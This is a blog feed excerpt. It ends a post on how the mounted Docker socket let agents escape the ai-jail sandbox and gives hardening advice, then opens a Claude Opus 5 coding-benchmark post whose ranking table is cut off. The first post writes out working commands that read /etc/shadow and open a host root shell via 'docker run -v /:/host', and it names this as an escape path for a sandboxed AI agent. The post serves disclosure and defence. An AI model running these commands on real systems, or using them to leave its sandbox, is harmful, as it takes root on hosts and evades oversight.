<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># confirm you&#39;re a regular user</span>
</span></span><span class="line"><span class="cl">$ id
</span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>akitaonrails<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>akitaonrails<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>...,docker
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># try reading /etc/shadow directly: denied, as expected</span>
</span></span><span class="line"><span class="cl">$ cat /etc/shadow
</span></span><span class="line"><span class="cl">cat: /etc/shadow: Permission denied
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># now ask the daemon to do it for you</span>
</span></span><span class="line"><span class="cl">$ docker run --rm -v /:/host alpine sh -c <span class="s1">&#39;head -3 /host/etc/shadow&#39;</span>
</span></span><span class="line"><span class="cl">root:<span class="nv">$6</span>$...:...
</span></span><span class="line"><span class="cl">bin:!:...
</span></span><span class="line"><span class="cl">daemon:!:...</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>And if you want the whole nine yards, a root shell on your own host:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ docker run --rm -it -v /:/host alpine chroot /host /bin/bash
</span></span><span class="line"><span class="cl"><span class="c1"># id</span>
</span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>No exploit, no 0-day. You used the official API, the documented way, and went from regular user to root in one command. That&rsquo;s exactly what an agent inside ai-jail could do until today, even with every layer (bwrap, Landlock, seccomp, rlimits) turned on.</p>
<h2>Why does this still exist?<span class="hx:absolute hx:-mt-20" id="why-does-this-still-exist"></span>
    <a href="#why-does-this-still-exist" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If everyone has known about this for over a decade, why hasn&rsquo;t anyone &ldquo;fixed&rdquo; it? Short answer: this is architecture, and architecture doesn&rsquo;t get patched.</p>
<ul>
<li>The root daemon with an all-powerful API was the design that made Docker simple to operate. Granular per-request authorization exists in the form of <a href="https://docs.docker.com/engine/extend/plugins_authorization/"target="_blank" rel="noopener">authorization plugins</a>, but it&rsquo;s opt-in, annoying to configure, and I can count on one hand the setups I&rsquo;ve seen using it.</li>
<li><a href="https://docs.docker.com/engine/security/userns-remap/"target="_blank" rel="noopener">userns-remap</a> has been around since Docker 1.10 and maps container root to an unprivileged user on the host. It ships turned off, because it breaks compatibility with images and volumes that assume uid 0.</li>
<li><a href="https://docs.docker.com/engine/security/rootless/"target="_blank" rel="noopener">Rootless mode</a> runs the whole daemon as your user, with the socket at <code>$XDG_RUNTIME_DIR/docker.sock</code>. It works, but it has network and storage limitations, and the entire internet of tutorials assumes the root daemon at the classic path.</li>
<li><a href="https://podman.io/"target="_blank" rel="noopener">Podman</a> was born rootless and daemonless precisely because of this criticism. There&rsquo;s a whole section about it below.</li>
</ul>
<p>Bottom line: this is here to stay. Every tool that mounts <code>/var/run/docker.sock</code> into an environment &ldquo;for convenience&rdquo; opens the same hole, knowingly or not. CI mounting the socket for image builds, remote IDEs, code-server, AI agent sandboxes (hi, me), web dashboard plugins. The fix always lives on the side of whoever builds the environment.</p>
<h2>Fun fact: this is anything but new<span class="hx:absolute hx:-mt-20" id="fun-fact-this-is-anything-but-new"></span>
    <a href="#fun-fact-this-is-anything-but-new" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If you&rsquo;ve been following me for a while, this whole story should give you déjà vu. Back in 2023 I recorded <a href="/2023/03/02/akitando-139-entendendo-como-containers-funcionam/">[Akitando #139] - Understanding How Containers Work</a>, where I explain what a container actually is: an ordinary Linux process, throttled by cgroups, fooled by namespaces, with its capabilities trimmed. No magic and no virtual machine. And look at what was already sitting in that episode&rsquo;s link list: a walkthrough of <a href="https://flast101.github.io/docker-privesc/"target="_blank" rel="noopener">privilege escalation via Docker</a>, demonstrating the exact <code>docker run -v /:/host</code> trick. The hole issue #88 exploited inside ai-jail is the same one I was already pointing at in a 2023 video, and it was old news long before that.</p>
<p>Nobody knows this better than Red Hat. <a href="https://podman.io/"target="_blank" rel="noopener">Podman</a> was born there in 2018 as a direct answer to that architecture: no central daemon, rootless by default. Every container becomes a direct child of your user, via fork-exec, with no all-powerful process running as root brokering anything. The whole &ldquo;docker.sock is root&rdquo; problem doesn&rsquo;t exist in that model, because there&rsquo;s no docker.sock, no daemon, and no root.</p>
<p>And before you ask: yes, I run Podman for some things and I recommend it. But it&rsquo;s no perfect solution either, and it&rsquo;s worth understanding why.</p>
<p>What Podman does well:</p>
<ul>
<li><strong>The right architecture.</strong> Daemonless and rootless from day zero. The entire vulnerability class from this article stops making sense.</li>
<li><strong>CLI compatibility.</strong> <code>alias docker=podman</code> covers the overwhelming majority of day-to-day commands. Build, run, push, pull: same commands, same flags.</li>
<li><strong>systemd integration.</strong> <a href="https://docs.podman.io/en/latest/markdown/podman-systemd.unit.5.html"target="_blank" rel="noopener">Quadlets</a> are, in my opinion, the cleanest way to run a container as a service on Linux. Docker never came close.</li>
</ul>
<p>Where it stumbles:</p>
<ul>
<li><strong>The compatibility socket isn&rsquo;t 100%.</strong> Podman offers a socket compatible with the Docker API (<code>podman.socket</code>), and plenty of tools work on top of it. But &ldquo;plenty&rdquo; isn&rsquo;t &ldquo;all&rdquo;: Testcontainers, some IDE plugins, more exotic CI tooling trip over behavioral differences. It works until the day it doesn&rsquo;t, and then you lose an afternoon debugging.</li>
<li><strong>Compose is a second-class citizen.</strong> The official <code>docker compose</code> does talk to the Podman socket, and <code>podman-compose</code> exists, but neither has the polish of the original pairing. Projects with a complicated compose file are where migrations usually get stuck.</li>
<li><strong>Rootless has a price.</strong> Rootless networking (slirp4netns, and pasta these days) has limits: no ping by default, weird source IPs, lower throughput. Images that assume uid 0 and volumes with wrong permissions need fiddling. Nothing fatal, but it&rsquo;s friction.</li>
<li><strong>Docker Desktop is a product.</strong> On macOS and Windows, Docker Desktop delivers a polished experience that Podman Desktop is still catching up to. For a lot of people, that&rsquo;s the only contact with containers they&rsquo;ll ever have.</li>
</ul>
<p>Add it all up and you get the answer to why the world stays on Docker: ecosystem inertia. Every tutorial, every CI pipeline, every example image, every <code>docker run</code> pasted from Stack Overflow assumes the root daemon at the classic path. Docker became the name of the category, the Kleenex of containers. Moving to Podman is technically easy and politically expensive: it&rsquo;s you against the accumulated knowledge of the entire internet.</p>
<p>One detail that matters for sandbox users: mounting the rootless Podman socket inside a jail is far less catastrophic than mounting the Docker one. The equivalent &ldquo;daemon&rdquo; runs as your user, so a malicious agent would gain your privileges, not root. Still bad (it could overwrite your <code>~/.ssh</code>, for one), but a whole different ballgame. Even so, ai-jail&rsquo;s default stands: don&rsquo;t mount any socket, from any runtime. Opt-in is opt-in.</p>
<h2>Best practices so this doesn&rsquo;t bite you<span class="hx:absolute hx:-mt-20" id="best-practices-so-this-doesnt-bite-you"></span>
    <a href="#best-practices-so-this-doesnt-bite-you" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The list I apply and recommend:</p>
<ol>
<li><strong>Treat the <code>docker</code> group as passwordless sudo.</strong> Before adding any user or service to it, ask whether you&rsquo;d give that thing unrestricted sudo. Same thing.</li>
<li><strong>Never mount <code>/var/run/docker.sock</code> into untrusted environments.</strong> AI agents, CI jobs running code from a stranger&rsquo;s pull request, third-party containers. Run <code>grep -r docker.sock</code> over your docker-compose files, CI manifests, and tool configs. It shows up in more places than you remember.</li>
<li><strong>Need to expose it to something semi-trusted? Use a socket proxy.</strong> <a href="https://github.com/wollomatic/socket-proxy"target="_blank" rel="noopener">wollomatic/socket-proxy</a> and <a href="https://github.com/Tecnativa/docker-socket-proxy"target="_blank" rel="noopener">Tecnativa&rsquo;s docker-socket-proxy</a> sit between the client and the daemon with an endpoint allowlist and blocking of arbitrary bind mounts. Read-only by default; you enable only what you need.</li>
<li><strong>Prefer rootless whenever possible.</strong> Rootless Podman on Linux is the cleanest path; Docker&rsquo;s own rootless mode is the second option. The daemon stops being root and this entire class of problem loses its bite.</li>
<li><strong>In CI, build images without a privileged daemon.</strong> <a href="https://github.com/GoogleContainerTools/kaniko"target="_blank" rel="noopener">Kaniko</a> and <a href="https://buildah.io/"target="_blank" rel="noopener">Buildah</a> build images rootless, with no socket mounted in the job at all.</li>
<li><strong>Can&rsquo;t go rootless? Turn on userns-remap.</strong> It costs an afternoon of testing with your volumes and buys real isolation between container root and host root.</li>
<li><strong>In ai-jail, let the default work for you.</strong> Docker off, and <code>--docker</code> only in projects where you trust the workload the way you&rsquo;d trust a sudo. Rule of thumb: if you wouldn&rsquo;t blindly hand <code>sudo</code> to the agent in that directory, don&rsquo;t hand it <code>--docker</code> either.</li>
</ol>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>A well-built sandbox loses much of its value with a back door left open for convenience. bwrap, Landlock, seccomp, and rlimits in ai-jail keep doing their jobs, but none of them can see what happens when the process inside politely asks the host&rsquo;s root daemon to mount the whole filesystem into a container. A security layer you don&rsquo;t audit becomes decoration.</p>
<p>My public thanks to <a href="https://github.com/mdindoffer"target="_blank" rel="noopener">@mdindoffer</a>: clean report, minimal repro, correct severity, and a solution proposal on top. That&rsquo;s how you report a vulnerability to an open source project.</p>
<p>If you want the full context of how I use sandboxes day to day, I wrote about it in <a href="/en/2026/07/11/how-to-protect-yourself-from-agents-deleting-your-stuff/">How Do I Protect Myself From My Agents Deleting My Stuff?</a>. The ai-jail story is in <a href="/en/2026/01/10/ai-agents-locking-down-your-system/">AI Agents: Locking Down Your System</a> and in the <a href="/en/2026/03/01/ai-jail-sandbox-for-ai-agents-from-shell-script-to-real-tool/">Rust rewrite</a>.</p>
<p>Now go run the upgrade.</p>
]]></content:encoded><category>ai-jail</category><category>containers</category><category>security</category></item><item><title>LLM Benchmark: Is Opus 5 Any Good?</title><link>https://www.akitaonrails.com/en/2026/07/25/llm-benchmark-is-opus-5-any-good/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/07/25/llm-benchmark-is-opus-5-any-good/</guid><pubDate>Sat, 25 Jul 2026 12:00:00 GMT</pubDate><description>&lt;p&gt;Anthropic released &lt;strong&gt;Claude Opus 5&lt;/strong&gt; yesterday. The obvious question is:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;ldquo;Is it any good?&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Short answer: &lt;strong&gt;yes, very&lt;/strong&gt;. It scored 95/100, Tier A, on my benchmark, with the most complete engineering I have seen so far from any of the harnesses I tested.&lt;/p&gt;
&lt;p&gt;Now for the answer that matters: no, this does not prove it is &amp;ldquo;the best LLM in the world.&amp;rdquo; It does not prove it is better than Fable 5, Opus 4.8, GPT 5.6 Sol, or Kimi K3 at whatever job you throw at them either. Last week I published an entire article on &lt;a href="https://www.akitaonrails.com/en/2026/07/19/llm-benchmark-should-i-use-the-highest-scoring-model/"&gt;why the highest score does not mean the best model&lt;/a&gt;. Opus 5 arrived just in time to hand us a fine case study for that argument.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Anthropic released <strong>Claude Opus 5</strong> yesterday. The obvious question is:</p>
<blockquote>
  <p>&ldquo;Is it any good?&rdquo;</p>

</blockquote>
<p>Short answer: <strong>yes, very</strong>. It scored 95/100, Tier A, on my benchmark, with the most complete engineering I have seen so far from any of the harnesses I tested.</p>
<p>Now for the answer that matters: no, this does not prove it is &ldquo;the best LLM in the world.&rdquo; It does not prove it is better than Fable 5, Opus 4.8, GPT 5.6 Sol, or Kimi K3 at whatever job you throw at them either. Last week I published an entire article on <a href="/en/2026/07/19/llm-benchmark-should-i-use-the-highest-scoring-model/">why the highest score does not mean the best model</a>. Opus 5 arrived just in time to hand us a fine case study for that argument.</p>
<h2>Where Anthropic positions Opus 5<span class="hx:absolute hx:-mt-20" id="where-anthropic-positions-opus-5"></span>
    <a href="#where-anthropic-positions-opus-5" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>In the <a href="https://www.anthropic.com/news/claude-opus-5"target="_blank" rel="noopener">official announcement</a>, Anthropic describes Opus 5 as an everyday model that comes close to Fable 5&rsquo;s frontier intelligence at half the price. It is now the default model on Claude Max and the strongest one available on Pro.</p>
<p>The product ladder looks simple enough:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">Opus 4.8  &lt;  Opus 5  ≈  Fable 5</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Except Anthropic&rsquo;s own data does not form such a tidy line. At maximum effort on CursorBench 3.2, Opus 5 lands within 0.5% of Fable 5&rsquo;s peak. On Frontier-Bench v0.1, it beats every other model and more than doubles Opus 4.8&rsquo;s result at a lower cost per task. On OSWorld 2.0, it even tops Fable&rsquo;s best result at a little over a third of the cost.</p>
<p>So &ldquo;somewhere between Opus 4.8 and Fable 5&rdquo; is a fair shortcut for understanding the product. It is not a universal ranking. The curves cross depending on the task and the effort setting.</p>
<p>Price is less fuzzy. Opus 5 costs <strong>$5 per million input tokens and $25 per million output tokens</strong>, the same as Opus 4.8. Fable 5 costs <strong>$10/$50</strong>. At API rates, Opus 5 delivers the most interesting promise in this release: near-Fable behavior without paying the Fable tax.</p>
<h2>The benchmark<span class="hx:absolute hx:-mt-20" id="the-benchmark"></span>
    <a href="#the-benchmark" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>For anyone just joining us, my <a href="https://github.com/akitaonrails/llm-coding-benchmark"target="_blank" rel="noopener">LLM Coding Benchmark</a> gives every model the same job: build a ChatGPT-style chat app on its own in Rails 8, with RubyLLM, Hotwire, Tailwind, tests, CI, Docker, and documentation.</p>
<p>I am not grading one isolated function. I grade the project that comes out the other end: whether it uses the real RubyLLM API, whether multi-turn works, whether it handles provider failures, whether the conversation persists, whether Turbo Streams is actually wired, whether the tests can catch bugs, and whether the production image boots.</p>
<p>Opus 5 ran solo through <strong>Claude Code headless</strong>, with <code>--dangerously-skip-permissions</code>, using my Max subscription. The numbers:</p>
<ul>
<li><strong>38m57s</strong></li>
<li><strong>201 turns</strong></li>
<li><strong>121 tests and 355 assertions</strong></li>
<li><strong>100% line coverage and 95.94% branch coverage</strong></li>
<li><strong>22.1 million cache-read tokens</strong></li>
<li><strong>$16.02 at equivalent API rates</strong>, billed to the subscription</li>
</ul>
<p>That needs an asterisk. Opus 4.8 and Fable 5 were tested in OpenCode through OpenRouter. GPT 5.6 Sol ran in Codex. Kimi K3 ran in Kimi Code CLI. A coding benchmark measures the whole package:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">model + prompt + harness + tools + context + execution + audit</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>That is why the repository keeps Opus 5 in the Claude Code profile instead of pretending this was a perfectly controlled comparison with the main table. I am combining the main ranking&rsquo;s 40 rows with the new result here because everyone wants to see where that 95 lands. The asterisk is doing real work.</p>
<h2>Updated ranking: main table + Opus 5<span class="hx:absolute hx:-mt-20" id="updated-ranking-main-table--opus-5"></span>
    <a href="#updated-ranking-main-table--opus-5" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><table>
  <thead>
      <tr>
          <th style="text-align: right">Rank</th>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: center">Tier</th>
          <th style="text-align: center">RubyLLM OK</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Run cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right"><strong>1</strong></td>
          <td><strong>Claude Opus 5 (Claude Code)*</strong></td>
          <td style="text-align: right"><strong>95</strong></td>
          <td style="text-align: center"><strong>A</strong></td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right"><strong>39m</strong></td>
          <td style="text-align: right"><strong>subscription (≈$16.02 API equiv.)</strong></td>
      </tr>
      <tr>
          <td style="text-align: right">1</td>
          <td>GPT 5.4 xHigh (Codex)</td>
          <td style="text-align: right">95</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">22m</td>
          <td style="text-align: right">~$16</td>
      </tr>
      <tr>
          <td style="text-align: right">1</td>
          <td>Claude Opus 4.8</td>
          <td style="text-align: right">95</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">17m</td>
          <td style="text-align: right">~$6.40</td>
      </tr>
      <tr>
          <td style="text-align: right">4</td>
          <td>Claude Fable 5</td>
          <td style="text-align: right">94</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">24m</td>
          <td style="text-align: right">~$11.20</td>
      </tr>
      <tr>
          <td style="text-align: right">5</td>
          <td>Claude Fable 5 (re-release)</td>
          <td style="text-align: right">93</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">18m</td>
          <td style="text-align: right">~$8.30</td>
      </tr>
      <tr>
          <td style="text-align: right">5</td>
          <td>Gemini 3.5 Flash</td>
          <td style="text-align: right">93</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">18m</td>
          <td style="text-align: right">~$3.55</td>
      </tr>
      <tr>
          <td style="text-align: right">7</td>
          <td>GPT 5.6 Sol xHigh (Codex)</td>
          <td style="text-align: right">92</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">17m</td>
          <td style="text-align: right">subscription (≈$8.70 API equiv.)</td>
      </tr>
      <tr>
          <td style="text-align: right">8</td>
          <td>Kimi K3 (Kimi Code CLI)</td>
          <td style="text-align: right">89</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">26m</td>
          <td style="text-align: right">subscription (≈$2.10 API equiv.)</td>
      </tr>
      <tr>
          <td style="text-align: right">9</td>
          <td>Claude Opus 4.7</td>
          <td style="text-align: right">87</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">18m</td>
          <td style="text-align: right">~$7.00</td>
      </tr>
      <tr>
          <td style="text-align: right">9</td>
          <td>Kimi K2.6</td>
          <td style="text-align: right">87</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">20m</td>
          <td style="text-align: right">~$1.19</td>
      </tr>
      <tr>
          <td style="text-align: right">9</td>
          <td>GLM 5.2 (Z.ai)</td>
          <td style="text-align: right">87</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">43m</td>
          <td style="text-align: right">subscription</td>
      </tr>
      <tr>
          <td style="text-align: right">9</td>
          <td>Grok 4.5</td>
          <td style="text-align: right">87</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">16m</td>
          <td style="text-align: right">~$5.10</td>
      </tr>
      <tr>
          <td style="text-align: right">13</td>
          <td>Kimi K2.7 Code</td>
          <td style="text-align: right">86</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">22m</td>
          <td style="text-align: right">~$1.23</td>
      </tr>
      <tr>
          <td style="text-align: right">14</td>
          <td>GPT 5.5 xHigh (Codex)</td>
          <td style="text-align: right">85</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">18m</td>
          <td style="text-align: right">~$10</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Claude Opus 4.6</td>
          <td style="text-align: right">83</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">16m</td>
          <td style="text-align: right">~$1.10 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Nex-N2-Pro</td>
          <td style="text-align: right">83</td>
          <td style="text-align: center">A</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">25m</td>
          <td style="text-align: right">~$0.34</td>
      </tr>
      <tr>
          <td style="text-align: right">17</td>
          <td>Gemini 3.1 Pro</td>
          <td style="text-align: right">79</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">14m</td>
          <td style="text-align: right">~$3.10</td>
      </tr>
      <tr>
          <td style="text-align: right">17</td>
          <td>Sakana Fugu Ultra</td>
          <td style="text-align: right">79</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">22m</td>
          <td style="text-align: right">subscription</td>
      </tr>
      <tr>
          <td style="text-align: right">19</td>
          <td>Claude Sonnet 4.6</td>
          <td style="text-align: right">78</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">16m</td>
          <td style="text-align: right">~$0.63 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">19</td>
          <td>DeepSeek V4 Flash</td>
          <td style="text-align: right">78</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">3m</td>
          <td style="text-align: right">~$0.01</td>
      </tr>
      <tr>
          <td style="text-align: right">19</td>
          <td>MiniMax M3</td>
          <td style="text-align: right">78</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">53m (phase 2 DNF)</td>
          <td style="text-align: right">~$1.25</td>
      </tr>
      <tr>
          <td style="text-align: right">19</td>
          <td>Qwen3.7 Max</td>
          <td style="text-align: right">78</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">19m</td>
          <td style="text-align: right">~$1.40</td>
      </tr>
      <tr>
          <td style="text-align: right">23</td>
          <td>Grok 4.3</td>
          <td style="text-align: right">72</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">15m</td>
          <td style="text-align: right">~$1.70</td>
      </tr>
      <tr>
          <td style="text-align: right">24</td>
          <td>Qwen 3.6 Plus</td>
          <td style="text-align: right">71</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">17m</td>
          <td style="text-align: right">~$0.15 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">25</td>
          <td>DeepSeek V4 Pro</td>
          <td style="text-align: right">69</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">22m (DNF)</td>
          <td style="text-align: right">~$0.05</td>
      </tr>
      <tr>
          <td style="text-align: right">25</td>
          <td>Kimi K2.5</td>
          <td style="text-align: right">69</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">29m</td>
          <td style="text-align: right">~$0.10 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">25</td>
          <td>Step 3.7 Flash</td>
          <td style="text-align: right">69</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">27m</td>
          <td style="text-align: right">~$0.80</td>
      </tr>
      <tr>
          <td style="text-align: right">28</td>
          <td>Xiaomi MiMo V2.5 Pro</td>
          <td style="text-align: right">67</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">11m</td>
          <td style="text-align: right">~$0.09</td>
      </tr>
      <tr>
          <td style="text-align: right">29</td>
          <td>GLM 5</td>
          <td style="text-align: right">64</td>
          <td style="text-align: center">B</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">17m</td>
          <td style="text-align: right">~$0.11 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">30</td>
          <td>Claude Sonnet 5</td>
          <td style="text-align: right">58</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">27m</td>
          <td style="text-align: right">~$2.25</td>
      </tr>
      <tr>
          <td style="text-align: right">31</td>
          <td>Step 3.5 Flash</td>
          <td style="text-align: right">56</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">⚠️ bypass</td>
          <td style="text-align: right">38m</td>
          <td style="text-align: right">~$0.02 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">32</td>
          <td>Qwen 3.5 35B</td>
          <td style="text-align: right">55</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">28m</td>
          <td style="text-align: right">local</td>
      </tr>
      <tr>
          <td style="text-align: right">33</td>
          <td>GLM 4.7 Flash bf16</td>
          <td style="text-align: right">52</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">✅</td>
          <td style="text-align: right">failed</td>
          <td style="text-align: right">local</td>
      </tr>
      <tr>
          <td style="text-align: right">34</td>
          <td>GLM 5.1 (Z.ai)</td>
          <td style="text-align: right">46</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">22m</td>
          <td style="text-align: right">subscription</td>
      </tr>
      <tr>
          <td style="text-align: right">35</td>
          <td>DeepSeek V3.2</td>
          <td style="text-align: right">43</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">60m</td>
          <td style="text-align: right">~$0.07 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">36</td>
          <td>Qwen 3.5 397B A17B</td>
          <td style="text-align: right">42</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">15m</td>
          <td style="text-align: right">~$0.31</td>
      </tr>
      <tr>
          <td style="text-align: right">37</td>
          <td>MiniMax M2.7</td>
          <td style="text-align: right">41</td>
          <td style="text-align: center">C</td>
          <td style="text-align: center">❌</td>
          <td style="text-align: right">14m</td>
          <td style="text-align: right">~$0.30 (hist.)</td>
      </tr>
      <tr>
          <td style="text-align: right">38</td>
          <td>Qwen 3.5 122B</td>
          <td style="text-align: right">37</td>
          <td style="text-align: center">D</td>
